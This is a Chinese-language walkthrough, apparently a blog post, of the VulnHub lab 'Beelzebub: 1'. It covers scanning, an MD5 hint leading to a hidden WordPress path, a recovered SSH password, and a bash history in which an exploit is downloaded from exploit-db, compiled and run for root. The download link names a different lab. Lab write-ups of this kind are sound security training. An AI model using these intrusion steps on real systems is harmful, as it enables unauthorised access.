- 英文名称:BEELZEBUB: 1
- 中文名称:别西卜:1
- 发布日期:2021 年 9 月 8 日
- 难度:容易
- 描述:您必须尽可能多地枚举,并且不要忘记 Base64。
- 下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、开机信息,知道用户名(krampus)
开机信息
2、主机发现(192.168.199.146)
主机发现
3、端口扫描(22、80端口)
端口扫描
4、查看web页面
web页面
5、扫描目录
dirb http://192.168.199.146/
或
dirsearch -u http://192.168.199.146/
扫描目录
6、访问index首页
index首页
查看index首页源代码,得到线索
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
index首页源代码
7、对 beelzebub 进行md5计算处理
└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1
d18e1e22becbd915b45e0e655429d487
md5计算
8、尝试访问链接,被301重定向
疑似wordpress站点
9、尝试遍历目录,可以确定就是wordpress站点
dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/
遍历目录
10、尝试访问uploads
uploads
点击 talk to valak
签订契约的人有时会试图智取魔鬼,但最终还是失败了。
talk to valak
11、尝试burp分析,拿到密码 M4k3Ad3a1
burp分析
12、尝试ssh登录
ssh登录
13、成功获得普通用户flag
普通flag
14、挖掘线索(.bash_history)
krampus@beelzebub:~$ ls -la
total 104
drwsrwxrwx 17 krampus krampus 4096 Mar 20 2021 .
drwxr-xr-x 3 root root 4096 Mar 16 2021 ..
-rw------- 1 krampus krampus 1407 Mar 20 2021 .bash_history
drwx------ 11 krampus krampus 4096 Mar 20 2021 .cache
drwxrwxrwx 14 krampus krampus 4096 May 26 2020 .config
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .dbus
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Desktop
drwxrwxrwx 2 krampus krampus 4096 Apr 8 2020 Documents
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Downloads
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .gnupg
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 .gvfs
-rwxrwxrwx 1 krampus krampus 12844 Mar 20 2021 .ICEauthority
drwxr-xr-x 3 krampus krampus 4096 Mar 19 2021 .local
drwxrwxrwx 5 krampus krampus 4096 Apr 2 2020 .mozilla
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Music
drwxrwxrwx 2 krampus krampus 4096 Oct 21 2019 Pictures
-rwxrwxrwx 1 krampus krampus 807 Oct 20 2019 .profile
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Public
-rwxrwxrwx 1 krampus krampus 66 Oct 20 2019 .selected_editor
-rw-rw-r-- 1 krampus krampus 83 May 26 2020 .Serv-U-Tray.conf
-rwxrwxrwx 1 krampus krampus 0 Oct 20 2019 .sudo_as_admin_successful
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Templates
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Videos
-rw-rw-r-- 1 krampus krampus 173 Mar 20 2021 .wget-hsts
15、查看历史记录
krampus@beelzebub:~$ cat .bash_history
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
chmod 0750 html/
ifconfig
cd /var/lib/mysql/
clear
ls
cd wordpress/
sudo su
su root
clear
ls
cd Desktop/
clear
ls
cat user.txt
clear
uname -a
sudo -1
sudo -i
clear
uname -a
sudo -i
find / -prem -u=s -type f 2>/dev/null
find / -prem -u=s -type f 2>/dev/null
cat /etc/issue
sudo -l
cd
cd ../
cd ../../../../
clear
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ls
cd
clear
ps -aux
ps -a
ps -a -U root
ps -a -U root | grep 'Serv'
ps -U root -au
ps -U root -au | sort -u
clear
cd /tmp/
clear
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
clear
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
clear
ls
cd Trash/
ls
cat info
cd info
ls
ls -la
cd ../
clear
cd ../
ls
rm -rf Trash/
clear
su root
history -R
history -r
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
history
clear
cd
clear
ip link
su root
clear
ls
history
clear
ls
cd /tmp/
ls
su root
exit
clear
16、根据 .bash_history 中的提示,完成提权,获得root的flag
复现
到此,实验完成~
发布于 2022-08-22 21:46